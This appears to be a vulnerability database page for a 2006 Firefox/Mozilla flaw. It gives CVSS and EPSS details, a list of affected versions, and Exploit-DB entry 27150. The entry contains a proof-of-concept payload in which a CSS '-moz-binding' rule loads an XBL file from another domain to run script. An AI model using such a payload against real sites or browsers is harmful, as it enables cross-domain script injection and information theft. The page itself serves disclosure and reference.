Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 27150
Publication date : 2006-01-29 23h00 +00:00
Author : Chris Thomas
EDB Verified : Yes
source: https://www.securityfocus.com/bid/16427/info
Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.
The issue affects the '-moz-binding' property.
This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.
http://domain1/path/to/page.html :
<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>
http://domain2/path/to/xbl.xml :
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>
Products Mentioned
Configuraton 0
Mozilla>>Firefox >> Version 1.0
Mozilla>>Firefox >> Version 1.0.1
Mozilla>>Firefox >> Version 1.0.2
Mozilla>>Firefox >> Version 1.0.3
Mozilla>>Firefox >> Version 1.0.4
Mozilla>>Firefox >> Version 1.0.5
Mozilla>>Firefox >> Version 1.0.6
Mozilla>>Firefox >> Version 1.0.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7
Mozilla>>Mozilla >> Version 1.7.1
Mozilla>>Mozilla >> Version 1.7.2
Mozilla>>Mozilla >> Version 1.7.3
Mozilla>>Mozilla >> Version 1.7.5
Mozilla>>Mozilla >> Version 1.7.6
Mozilla>>Mozilla >> Version 1.7.7
Mozilla>>Mozilla >> Version 1.7.8
Mozilla>>Mozilla >> Version 1.7.10
Mozilla>>Mozilla >> Version 1.7.11
Mozilla>>Mozilla >> Version 1.7.12
References